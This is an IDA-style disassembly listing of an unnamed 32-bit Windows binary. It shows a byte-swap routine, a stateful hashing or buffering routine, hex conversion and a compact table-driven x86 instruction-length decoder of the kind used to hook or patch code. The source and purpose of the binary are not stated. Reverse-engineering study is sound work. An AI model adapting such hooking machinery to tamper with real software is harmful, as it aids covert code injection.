push 0Bh
loc_9B649A: ; CODE XREF: sub_9B6363+43�j
; sub_9B6363+5E�j ...
pop eax
loc_9B649B: ; CODE XREF: sub_9B6363+12B�j
pop ebx
loc_9B649C: ; CODE XREF: sub_9B6363+22�j
pop edi
pop esi
leave
retn
sub_9B6363 endp
; =============== S U B R O U T I N E =======================================
sub_9B64A0 proc near ; CODE XREF: sub_9B6513+1F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edx, edx
or edx, esi
xor ecx, ecx
or eax, ecx
mov ebx, edx
mov esi, edx
mov edi, eax
shld ebx, edi, 10h
mov ecx, eax
shrd ecx, esi, 10h
shld edx, eax, 10h
shl edi, 10h
xor ecx, edi
shr esi, 10h
xor esi, ebx
shl eax, 10h
mov edi, 0FFFFh
and esi, edi
and ecx, edi
xor esi, edx
xor ecx, eax
mov ebx, esi
mov edx, esi
mov edi, ecx
shld ebx, edi, 8
mov eax, ecx
shrd eax, edx, 8
shl edi, 8
shr edx, 8
xor eax, edi
shld esi, ecx, 8
xor edx, ebx
mov edi, 0FF00FFh
and eax, edi
and edx, edi
pop edi
xor edx, esi
shl ecx, 8
pop esi
xor eax, ecx
pop ebx
retn
sub_9B64A0 endp
; =============== S U B R O U T I N E =======================================
sub_9B6513 proc near ; CODE XREF: sub_9B66FE+6A�p
; sub_9B6BB5+62�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp ds:dword_9B9DF8, 1
jnz short locret_9B6547
push edi
xor edi, edi
cmp [esp+4+arg_4], edi
jle short loc_9B6546
push esi
loc_9B6526: ; CODE XREF: sub_9B6513+30�j
mov eax, [esp+8+arg_0]
lea esi, [eax+edi*8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_9B64A0
inc edi
cmp edi, [esp+10h+arg_4]
pop ecx
pop ecx
mov [esi], eax
mov [esi+4], edx
jl short loc_9B6526
pop esi
loc_9B6546: ; CODE XREF: sub_9B6513+10�j
pop edi
locret_9B6547: ; CODE XREF: sub_9B6513+7�j
retn
sub_9B6513 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B6548 proc near ; CODE XREF: sub_9B6942+BC�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov edi, [ebp+arg_C]
xor edx, edx
cmp edi, edx
jz loc_9B6662
mov eax, [ebp+arg_4]
mov ecx, eax
and ecx, 7
push ebx
push esi
mov [ebp+var_4], edx
jz short loc_9B6586
mov ebx, [ebp+arg_0]
mov edx, ecx
mov esi, eax
shr esi, 3
mov bl, [esi+ebx]
mov cl, 8
sub cl, dl
shr bl, cl
movzx cx, bl
mov word ptr [ebp+var_4], cx
loc_9B6586: ; CODE XREF: sub_9B6548+21�j
add edi, 7
shr eax, 3
shr edi, 3
xor esi, esi
test edi, edi
mov [ebp+var_C], eax
jle loc_9B6660
lea eax, [edi-1]
loc_9B659F: ; CODE XREF: sub_9B6548+112�j
cmp esi, eax
jz short loc_9B65B7
mov eax, [ebp+arg_8]
movzx ax, byte ptr [esi+eax]
xor ecx, ecx
mov ch, byte ptr [ebp+var_4]
xor eax, ecx
add edx, 8
jmp short loc_9B65E7
; ---------------------------------------------------------------------------
loc_9B65B7: ; CODE XREF: sub_9B6548+59�j
mov eax, [ebp+arg_C]
and eax, 7
mov [ebp+var_8], 8
jz short loc_9B65C9
mov [ebp+var_8], eax
loc_9B65C9: ; CODE XREF: sub_9B6548+7C�j
mov eax, [ebp+arg_8]
movzx eax, byte ptr [esi+eax]
mov ebx, [ebp+var_4]
mov cl, 8
sub cl, byte ptr [ebp+var_8]
shr al, cl
mov ecx, [ebp+var_8]
shl ebx, cl
movzx ax, al
or eax, ebx
add edx, ecx
loc_9B65E7: ; CODE XREF: sub_9B6548+6D�j
mov [ebp+var_4], eax
xor ecx, ecx
lea eax, [edi-1]
cmp esi, eax
setnz cl
mov [ebp+var_10], ecx
loc_9B65F7: ; CODE XREF: sub_9B6548+10D�j
mov ecx, [ebp+var_10]
xor eax, eax
cmp edx, 8
setnl al
test ecx, eax
jnz short loc_9B661B
xor ecx, ecx
lea eax, [edi-1]
cmp esi, eax
setz cl
xor ebx, ebx
test edx, edx
setnle bl
test ebx, ecx
jz short loc_9B6657
loc_9B661B: ; CODE XREF: sub_9B6548+BC�j
push 8
pop eax
cmp edx, eax
mov [ebp+var_8], eax
jg short loc_9B6628
mov [ebp+var_8], edx
loc_9B6628: ; CODE XREF: sub_9B6548+DB�j
mov ebx, [ebp+var_4]
mov cl, dl
sub cl, byte ptr [ebp+var_8]
shr bx, cl
mov ecx, eax
sub ecx, [ebp+var_8]
mov eax, 0FF00h
shl bl, cl
mov ecx, [ebp+var_8]
sar eax, cl
mov ecx, [ebp+var_C]
and bl, al
mov eax, [ebp+arg_0]
inc [ebp+var_C]
sub edx, [ebp+var_8]
mov [ecx+eax], bl
jmp short loc_9B65F7
; ---------------------------------------------------------------------------
loc_9B6657: ; CODE XREF: sub_9B6548+D1�j
inc esi
cmp esi, edi
jl loc_9B659F
loc_9B6660: ; CODE XREF: sub_9B6548+4E�j
pop esi
pop ebx
loc_9B6662: ; CODE XREF: sub_9B6548+E�j
pop edi
leave
retn
sub_9B6548 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B6665(void *Dst, int)
sub_9B6665 proc near ; CODE XREF: sub_9B5980+19�p
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
push edi
push 4
cdq
pop ecx
idiv ecx
mov esi, [ebp+Dst]
mov edi, eax
add edi, 28h
test esi, esi
jnz short loc_9B6684
push 3
pop eax
jmp short loc_9B66FA
; ---------------------------------------------------------------------------
loc_9B6684: ; CODE XREF: sub_9B6665+18�j
push ebx
xor ebx, ebx
inc ebx
cmp [ebp+arg_4], ebx
jl short loc_9B66F6
cmp [ebp+arg_4], 200h
jg short loc_9B66F6
push 3C98h ; Size
push 0 ; Val
push esi ; Dst
mov ds:dword_9B9DF8, ebx
call memset
mov eax, [ebp+arg_4]
xor ecx, ecx
add esp, 0Ch
mov [esi], eax
xor eax, eax
cmp edi, 0FFh
setnle cl
xor edx, edx
cmp edi, eax
setl dl
mov [esi+128h], eax
mov dword ptr [esi+12Ch], 40h
or ecx, edx
jz short loc_9B66DD
push 11h
jmp short loc_9B66F8
; ---------------------------------------------------------------------------
loc_9B66DD: ; CODE XREF: sub_9B6665+72�j
mov [esi+130h], edi
mov [esi+0CCh], ebx
mov [esi+134h], ebx
mov ds:dword_9BA2E4, eax
jmp short loc_9B66F9
; ---------------------------------------------------------------------------
loc_9B66F6: ; CODE XREF: sub_9B6665+26�j
; sub_9B6665+2F�j
push 2
loc_9B66F8: ; CODE XREF: sub_9B6665+76�j
pop eax
loc_9B66F9: ; CODE XREF: sub_9B6665+8F�j
pop ebx
loc_9B66FA: ; CODE XREF: sub_9B6665+1D�j
pop edi
pop esi
pop ebp
retn
sub_9B6665 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B66FE proc near ; CODE XREF: sub_9B67ED+A2�p
Dst = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_9B670E
push 3
jmp short loc_9B6719
; ---------------------------------------------------------------------------
loc_9B670E: ; CODE XREF: sub_9B66FE+A�j
cmp dword ptr [esi+0CCh], 0
jnz short loc_9B671F
push 5
loc_9B6719: ; CODE XREF: sub_9B66FE+E�j
pop eax
jmp loc_9B67EA
; ---------------------------------------------------------------------------
loc_9B671F: ; CODE XREF: sub_9B66FE+17�j
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
jge short loc_9B672F
push 6
loc_9B6729: ; CODE XREF: sub_9B66FE+38�j
pop eax
jmp loc_9B67E9
; ---------------------------------------------------------------------------
loc_9B672F: ; CODE XREF: sub_9B66FE+27�j
cmp ebx, 1Ch
jl short loc_9B6738
push 7
jmp short loc_9B6729
; ---------------------------------------------------------------------------
loc_9B6738: ; CODE XREF: sub_9B66FE+34�j
lea eax, [esi+0D8h]
add dword ptr [eax], 1
adc dword ptr [eax+4], 0
cmp ebx, 1
jnz short loc_9B676F
mov eax, [esi+12Ch]
inc eax
cmp eax, ebx
jle short loc_9B675F
push 40h
lea eax, [esi+338h]
jmp short loc_9B6767
; ---------------------------------------------------------------------------
loc_9B675F: ; CODE XREF: sub_9B66FE+55�j
push 30h
lea eax, [esi+3B8h]
loc_9B6767: ; CODE XREF: sub_9B66FE+5F�j
push eax
call sub_9B6513
pop ecx
pop ecx
loc_9B676F: ; CODE XREF: sub_9B66FE+4A�j
push edi
lea ecx, [esi+ebx*4+3B38h]
mov [ebp+arg_4], ecx
mov eax, 1000h
sub eax, [ecx]
mov ecx, ebx
shl ecx, 9
lea ecx, [ecx+esi+138h]
push ecx
push dword ptr [esi]
lea edi, [esi+ebx*8+3BB0h]
push dword ptr [esi+128h]
add esi, 0E8h
push eax
push [ebp+arg_C]
mov [ebp+Dst], ecx
push dword ptr [esi+44h]
push dword ptr [esi+48h]
push dword ptr [edi]
push ebx
push esi
push offset dword_9A70E0
push [ebp+arg_0]
call sub_9B6363
xor ecx, ecx
add esp, 30h
cmp eax, ecx
jnz short loc_9B67E8
add dword ptr [edi], 1
mov eax, [ebp+arg_4]
push 200h ; Size
adc [edi+4], ecx
push ecx ; Val
push [ebp+Dst] ; Dst
mov [eax], ecx
call memset
add esp, 0Ch
xor eax, eax
loc_9B67E8: ; CODE XREF: sub_9B66FE+CA�j
pop edi
loc_9B67E9: ; CODE XREF: sub_9B66FE+2C�j
pop ebx
loc_9B67EA: ; CODE XREF: sub_9B66FE+1C�j
pop esi
leave
retn
sub_9B66FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B67ED proc near ; CODE XREF: sub_9B67ED+148�p
; sub_9B6942+FD�p ...
Src = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 80h
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
jnz short loc_9B6805
push 3
jmp short loc_9B680F
; ---------------------------------------------------------------------------
loc_9B6805: ; CODE XREF: sub_9B67ED+12�j
cmp [esi+0CCh], ebx
jnz short loc_9B6815
push 5
loc_9B680F: ; CODE XREF: sub_9B67ED+16�j
pop eax
jmp loc_9B693E
; ---------------------------------------------------------------------------
loc_9B6815: ; CODE XREF: sub_9B67ED+1E�j
cmp [ebp+arg_8], ebx
push edi
mov edi, [ebp+arg_4]
jnz short loc_9B6832
cmp dword ptr [esi+edi*4+3B38h], 1000h
jnb short loc_9B6878
loc_9B682B: ; CODE XREF: sub_9B67ED+6C�j
; sub_9B67ED+77�j ...
xor eax, eax
jmp loc_9B693D
; ---------------------------------------------------------------------------
loc_9B6832: ; CODE XREF: sub_9B67ED+2F�j
cmp edi, [esi+134h]
jnz short loc_9B6878
mov eax, [esi+12Ch]
inc eax
cmp edi, eax
jnz short loc_9B6866
cmp dword ptr [esi+edi*4+3B38h], 400h
jnz short loc_9B6878
cmp [esi+edi*8+3BB4h], ebx
ja short loc_9B682B
cmp [esi+edi*8+3BB0h], ebx
jbe short loc_9B6878
jmp short loc_9B682B
; ---------------------------------------------------------------------------
loc_9B6866: ; CODE XREF: sub_9B67ED+56�j
cmp edi, 1
jle short loc_9B6878
cmp dword ptr [esi+edi*4+3B38h], 400h
jz short loc_9B682B
loc_9B6878: ; CODE XREF: sub_9B67ED+3C�j
; sub_9B67ED+4B�j ...
cmp [ebp+arg_8], ebx
jz short loc_9B6888
cmp edi, [esi+134h]
jnz short loc_9B6888
xor ebx, ebx
inc ebx
loc_9B6888: ; CODE XREF: sub_9B67ED+8E�j
; sub_9B67ED+96�j
push ebx
push edi
lea eax, [ebp+Src]
push esi
push eax
call sub_9B66FE
add esp, 10h
test eax, eax
jnz loc_9B693D
cmp ebx, 1
jnz short loc_9B68BE
push 80h ; Size
lea eax, [ebp+Src]
push eax ; Src
add esi, 8
push esi ; Dst
call memcpy
add esp, 0Ch
jmp loc_9B682B
; ---------------------------------------------------------------------------
loc_9B68BE: ; CODE XREF: sub_9B67ED+B5�j
mov eax, [esi+12Ch]
inc eax
inc edi
cmp edi, eax
jl short loc_9B68F2
mov edi, eax
cmp edi, eax
jnz short loc_9B68F2
mov eax, [esi+edi*8+3BB0h]
or eax, [esi+edi*8+3BB4h]
jnz short loc_9B68F2
lea eax, [esi+edi*4+3B38h]
cmp dword ptr [eax], 0
jnz short loc_9B68F2
mov dword ptr [eax], 400h
loc_9B68F2: ; CODE XREF: sub_9B67ED+DB�j
; sub_9B67ED+E1�j ...
push 80h ; Size
lea eax, [ebp+Src]
push eax ; Src
lea ebx, [esi+edi*4+3B38h]
mov eax, [ebx]
shr eax, 3
mov ecx, edi
shl ecx, 9
add eax, esi
lea eax, [ecx+eax+138h]
push eax ; Dst
call memcpy
add dword ptr [ebx], 400h
lea eax, [esi+134h]
add esp, 0Ch
cmp edi, [eax]
jle short loc_9B6930
mov [eax], edi
loc_9B6930: ; CODE XREF: sub_9B67ED+13F�j
push [ebp+arg_8]
push edi
push esi
call sub_9B67ED
add esp, 0Ch
loc_9B693D: ; CODE XREF: sub_9B67ED+40�j
; sub_9B67ED+AC�j
pop edi
loc_9B693E: ; CODE XREF: sub_9B67ED+23�j
pop esi
pop ebx
leave
retn
sub_9B67ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B6942 proc near ; CODE XREF: sub_9B5980+32�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
xor eax, eax
cmp esi, eax
jnz short loc_9B6953
push 3
jmp short loc_9B6966
; ---------------------------------------------------------------------------
loc_9B6953: ; CODE XREF: sub_9B6942+B�j
cmp [esi+0CCh], eax
jnz short loc_9B695F
push 5
jmp short loc_9B6966
; ---------------------------------------------------------------------------
loc_9B695F: ; CODE XREF: sub_9B6942+17�j
cmp [ebp+arg_4], eax
jnz short loc_9B696C
push 8
loc_9B6966: ; CODE XREF: sub_9B6942+F�j
; sub_9B6942+1B�j
pop eax
jmp loc_9B6A67
; ---------------------------------------------------------------------------
loc_9B696C: ; CODE XREF: sub_9B6942+20�j
cmp [ebp+arg_C], eax
push ebx
mov [ebp+arg_0], eax
jb loc_9B6A64
ja short loc_9B6984
cmp [ebp+arg_8], eax
jbe loc_9B6A64
loc_9B6984: ; CODE XREF: sub_9B6942+37�j
; sub_9B6942+10E�j ...
mov edx, [ebp+arg_8]
mov eax, [ebp+arg_C]
mov ecx, 1000h
sub ecx, [esi+3B3Ch]
xor ebx, ebx
sub edx, [ebp+arg_0]
sbb eax, ebx
cmp eax, ebx
ja short loc_9B69AA
jb short loc_9B69A6
cmp edx, ecx
jnb short loc_9B69AA
loc_9B69A6: ; CODE XREF: sub_9B6942+5E�j
mov ebx, edx
jmp short loc_9B69AC
; ---------------------------------------------------------------------------
loc_9B69AA: ; CODE XREF: sub_9B6942+5C�j
; sub_9B6942+62�j
mov ebx, ecx
loc_9B69AC: ; CODE XREF: sub_9B6942+66�j
test bl, 7
jnz short loc_9B69E6
mov eax, [esi+3B3Ch]
test al, 7
jnz short loc_9B69E6
test byte ptr [ebp+arg_0], 7
jnz short loc_9B69E6
mov ecx, ebx
shr ecx, 3
push ecx ; Size
mov ecx, [ebp+arg_0]
shr ecx, 3
add ecx, [ebp+arg_4]
shr eax, 3
push ecx ; Src
lea eax, [eax+esi+338h]
push eax ; Dst
call memcpy
add esp, 0Ch
jmp short loc_9B6A06
; ---------------------------------------------------------------------------
loc_9B69E6: ; CODE XREF: sub_9B6942+6D�j
; sub_9B6942+77�j ...
mov eax, [ebp+arg_0]
shr eax, 3
add eax, [ebp+arg_4]
push ebx
push eax
push dword ptr [esi+3B3Ch]
lea eax, [esi+338h]
push eax
call sub_9B6548
add esp, 10h
loc_9B6A06: ; CODE XREF: sub_9B6942+A2�j
add [esi+3B3Ch], ebx
add [ebp+arg_0], ebx
add [esi+0D0h], ebx
mov eax, [esi+3B3Ch]
adc dword ptr [esi+0D4h], 0
cmp eax, 1000h
jnz short loc_9B6A4B
xor eax, eax
cmp eax, [ebp+arg_C]
ja short loc_9B6A4B
jb short loc_9B6A3A
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_8]
jnb short loc_9B6A4B
loc_9B6A3A: ; CODE XREF: sub_9B6942+EE�j
push 0
push 1
push esi
call sub_9B67ED
add esp, 0Ch
test eax, eax
jnz short loc_9B6A66
loc_9B6A4B: ; CODE XREF: sub_9B6942+E5�j
; sub_9B6942+EC�j ...
xor eax, eax
cmp eax, [ebp+arg_C]
jb loc_9B6984
ja short loc_9B6A64
mov eax, [ebp+arg_8]
cmp [ebp+arg_0], eax
jb loc_9B6984
loc_9B6A64: ; CODE XREF: sub_9B6942+31�j
; sub_9B6942+3C�j ...
xor eax, eax
loc_9B6A66: ; CODE XREF: sub_9B6942+107�j
pop ebx
loc_9B6A67: ; CODE XREF: sub_9B6942+25�j
pop esi
pop ebp
retn
sub_9B6942 endp
; =============== S U B R O U T I N E =======================================
sub_9B6A6A proc near ; CODE XREF: sub_9B6BB5+90�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_9B6A78
push 3
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B6A78: ; CODE XREF: sub_9B6A6A+7�j
mov eax, [esi]
add eax, 7
push 8
cdq
pop ecx
idiv ecx
test eax, eax
jle short loc_9B6AD6
push ebx
push ebp
mov [esp+0Ch+arg_0], 0FFFFFFF8h
sub [esp+0Ch+arg_0], esi
push edi
lea ecx, [esi+8]
lea edi, [esi+49h]
loc_9B6A9C: ; CODE XREF: sub_9B6A6A+67�j
movzx eax, byte ptr [ecx]
shr eax, 4
mov al, ds:byte_9A7158[eax]
mov [edi-1], al
xor eax, eax
mov al, [ecx]
push 8
pop ebp
and eax, 0Fh
mov al, ds:byte_9A7158[eax]
mov [edi], al
mov eax, [esp+10h+arg_0]
inc ecx
lea ebx, [eax+ecx]
mov eax, [esi]
add eax, 7
cdq
idiv ebp
inc edi
inc edi
cmp ebx, eax
jl short loc_9B6A9C
pop edi
pop ebp
pop ebx
loc_9B6AD6: ; CODE XREF: sub_9B6A6A+1B�j
mov eax, [esi]
add eax, 3
push 4
cdq
pop ecx
idiv ecx
mov byte ptr [eax+esi+48h], 0
xor eax, eax
pop esi
retn
sub_9B6A6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B6AEA proc near ; CODE XREF: sub_9B6BB5+8A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_0]
mov ecx, [esi]
push edi
lea eax, [ecx+7]
cdq
push 8
pop edi
idiv edi
push 8
mov ebx, 80h
mov edi, eax
mov eax, ecx
cdq
pop ecx
idiv ecx
test edi, edi
mov [ebp+var_C], edi
mov [ebp+var_8], edx
jle short loc_9B6B2F
mov ecx, ebx
lea eax, [esi+8]
sub ecx, edi
mov [ebp+arg_0], edi
loc_9B6B24: ; CODE XREF: sub_9B6AEA+43�j
mov dl, [ecx+eax]
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_9B6B24
loc_9B6B2F: ; CODE XREF: sub_9B6AEA+2E�j
cmp edi, ebx
jge short loc_9B6B50
lea edx, [edi+esi+8]
mov ecx, ebx
sub ecx, edi
mov edi, edx
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov edi, [ebp+var_C]
loc_9B6B50: ; CODE XREF: sub_9B6AEA+47�j
cmp [ebp+var_8], 0
jle short loc_9B6BB0
test edi, edi
jle short loc_9B6BB0
push 8
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_4], 0FFFFFFF9h
sub [ebp+var_4], esi
mov [ebp+arg_0], 0FFFFFFF8h
sub [ebp+arg_0], esi
mov [ebp+var_10], eax
lea eax, [esi+8]
loc_9B6B7A: ; CODE XREF: sub_9B6AEA+C4�j
mov dl, [eax]
mov ecx, [ebp+var_10]
shl dl, cl
mov ecx, [ebp+var_4]
add ecx, eax
cmp ecx, ebx
mov [eax], dl
jge short loc_9B6BA6
mov ecx, [ebp+arg_0]
mov edi, [ebp+var_C]
add ecx, eax
mov bl, [ecx+esi+9]
mov cl, byte ptr [ebp+var_8]
shr bl, cl
or bl, dl
mov [eax], bl
mov ebx, 80h
loc_9B6BA6: ; CODE XREF: sub_9B6AEA+A0�j
mov ecx, [ebp+arg_0]
inc eax
add ecx, eax
cmp ecx, edi
jl short loc_9B6B7A
loc_9B6BB0: ; CODE XREF: sub_9B6AEA+6A�j
; sub_9B6AEA+6E�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B6AEA endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B6BB5(int, void *Dst)
sub_9B6BB5 proc near ; CODE XREF: sub_9B5980+40�p
arg_0 = dword ptr 4
Dst = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_9B6BC2
push 3
jmp short loc_9B6BCD
; ---------------------------------------------------------------------------
loc_9B6BC2: ; CODE XREF: sub_9B6BB5+7�j
cmp dword ptr [esi+0CCh], 0
jnz short loc_9B6BD0
push 5
loc_9B6BCD: ; CODE XREF: sub_9B6BB5+B�j
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B6BD0: ; CODE XREF: sub_9B6BB5+14�j
push ebx
xor ebx, ebx
inc ebx
cmp [esi+0E0h], ebx
jz short loc_9B6C53
mov ecx, [esi+134h]
cmp ecx, ebx
mov eax, ebx
jz short loc_9B6C01
jl short loc_9B6C01
lea ecx, [esi+3B3Ch]
loc_9B6BF0: ; CODE XREF: sub_9B6BB5+4A�j
cmp dword ptr [ecx], 0
ja short loc_9B6C01
inc eax
add ecx, 4
cmp eax, [esi+134h]
jle short loc_9B6BF0
loc_9B6C01: ; CODE XREF: sub_9B6BB5+31�j
; sub_9B6BB5+33�j ...
push ebx
push eax
push esi
call sub_9B67ED
add esp, 0Ch
test eax, eax
jnz short loc_9B6C55
push edi
lea edi, [esi+8]
push 10h
push edi
call sub_9B6513
cmp [esp+14h+Dst], 0
pop ecx
pop ecx
jz short loc_9B6C3E
mov eax, [esi]
add eax, 7
push 8
pop ecx
cdq
idiv ecx
push eax ; Size
push edi ; Src
push [esp+14h+Dst] ; Dst
call memcpy
add esp, 0Ch
loc_9B6C3E: ; CODE XREF: sub_9B6BB5+6E�j
push esi
call sub_9B6AEA
push esi
call sub_9B6A6A
pop ecx
pop ecx
mov [esi+0E0h], ebx
pop edi
loc_9B6C53: ; CODE XREF: sub_9B6BB5+25�j
xor eax, eax
loc_9B6C55: ; CODE XREF: sub_9B6BB5+59�j
pop ebx
pop esi
retn
sub_9B6BB5 endp
; ---------------------------------------------------------------------------
align 10h
loc_9B6C60: ; CODE XREF: sub_9AA2CE+58�p
pusha
cld
xor edx, edx
mov esi, [esp+24h]
mov ebp, esp
push 1097F71Ch
push 0F71C6780h
push 17389718h
push 101CB718h
push 17302C17h
push 18173017h
push 0F715F547h
push 4C103748h
push 272CE7F7h
push 0F7AC6087h
push 1C121C52h
push 7C10871Ch
push 201C701Ch
push 4767602Bh
push 20211011h
push 40121625h
push 82872022h
push 47201220h
push 13101419h
push 18271013h
push 28858260h
push 15124045h
push 5016A0C7h
push 28191812h
push 0F2401812h
push 19154127h
push 50F0F011h
mov ecx, 15124710h
push ecx
push 11151247h
push 10111512h
push 47101115h
mov eax, 12472015h
push eax
push eax
push 12471A10h
add cl, 10h
push ecx
sub cl, 20h
push ecx
xor ecx, ecx
dec ecx
loc_9B6D1D: ; CODE XREF: .text:009B6D40�j
inc ecx
mov edi, esp
loc_9B6D20: ; CODE XREF: .text:009B6D4A�j
lodsb
mov bh, al
loc_9B6D23: ; CODE XREF: .text:009B6D2B�j
mov ah, [edi]
inc edi
shr ah, 4
sub al, ah
jnb short loc_9B6D23
mov al, [edi-1]
and al, 0Fh
cmp al, 0Ch
jnz short loc_9B6D39
pop edx
not edx
loc_9B6D39: ; CODE XREF: .text:009B6D34�j
inc edx
cmp al, 0
jz short loc_9B6D7F
cmp al, 1
jz short loc_9B6D1D
add edi, 51h
cmp al, 0Ah
jz short loc_9B6D20
mov edi, [ebp+24h]
inc edx
cmp al, 2
jz short loc_9B6D7F
cmp al, 7
jz short loc_9B6D87
cmp al, 0Bh
jz short loc_9B6DDA
loc_9B6D5C: ; CODE XREF: .text:009B6DE5�j
inc edx
cmp al, 3
jz short loc_9B6D7F
cmp al, 8
jz short loc_9B6D87
inc edx
cmp al, 4
jz short loc_9B6D7F
inc edx
inc edx
pusha
mov al, 66h
repne scasb
popa
jnz short loc_9B6D76
loc_9B6D74: ; CODE XREF: .text:009B6DF0�j
; .text:009B6E08�j
dec edx
dec edx
loc_9B6D76: ; CODE XREF: .text:009B6D72�j
cmp al, 9
jz short loc_9B6D87
sub al, 5
jz short loc_9B6DEA
loc_9B6D7E: ; CODE XREF: .text:009B6DCA�j
; .text:009B6DCE�j ...
inc edx
loc_9B6D7F: ; CODE XREF: .text:009B6D3C�j
; .text:009B6D52�j ...
mov esp, ebp
mov [esp+1Ch], edx
popa
retn
; ---------------------------------------------------------------------------
loc_9B6D87: ; CODE XREF: .text:009B6D56�j
; .text:009B6D63�j ...
lodsb
mov ah, al
shr al, 7
jb short loc_9B6DA1
jz short loc_9B6DA5
add dl, 4
pusha
mov al, 67h
repne scasb
popa
jnz short loc_9B6DA5
sub dl, 3
dec al
loc_9B6DA1: ; CODE XREF: .text:009B6D8D�j
jnz short loc_9B6D7F
inc edx
inc eax
loc_9B6DA5: ; CODE XREF: .text:009B6D8F�j
; .text:009B6D9A�j
and ah, 7
pusha
mov al, 67h
repne scasb
popa
jz short loc_9B6DC3
cmp ah, 4
jz short loc_9B6DCC
cmp ah, 5
jnz short loc_9B6D7F
dec al
jz short loc_9B6D7F
loc_9B6DBE: ; CODE XREF: .text:009B6DD8�j
add dl, 4
jmp short loc_9B6D7F
; ---------------------------------------------------------------------------
loc_9B6DC3: ; CODE XREF: .text:009B6DAE�j
cmp ax, 600h
jnz short loc_9B6D7F
inc edx
jmp short loc_9B6D7E
; ---------------------------------------------------------------------------
loc_9B6DCC: ; CODE XREF: .text:009B6DB3�j
cmp al, 0
jnz short loc_9B6D7E
lodsb
and al, 7
sub al, 5
jnz short loc_9B6D7E
inc edx
jmp short loc_9B6DBE
; ---------------------------------------------------------------------------
loc_9B6DDA: ; CODE XREF: .text:009B6D5A�j
test byte ptr [esi], 38h
jnz short loc_9B6D87
mov al, 8
shr bh, 1
adc al, 0
jmp loc_9B6D5C
; ---------------------------------------------------------------------------
loc_9B6DEA: ; CODE XREF: .text:009B6D7C�j
sub bh, 0A0h
cmp bh, 4
jnb short loc_9B6D74
pusha
mov al, 67h
repne scasb
popa
jnz short loc_9B6DFC
dec edx
dec edx
loc_9B6DFC: ; CODE XREF: .text:009B6DF8�j
pusha
mov al, 66h
repne scasb
popa
jz loc_9B6D7E
jnz loc_9B6D74
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_9B9DFC
jmp short loc_9B6EF0
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_2: ; Microsoft VisualC 2-9/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; [00000006 BYTES: COLLAPSED FUNCTION strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcmp. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcat. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcmp. PRESS KEYPAD "+" TO EXPAND]
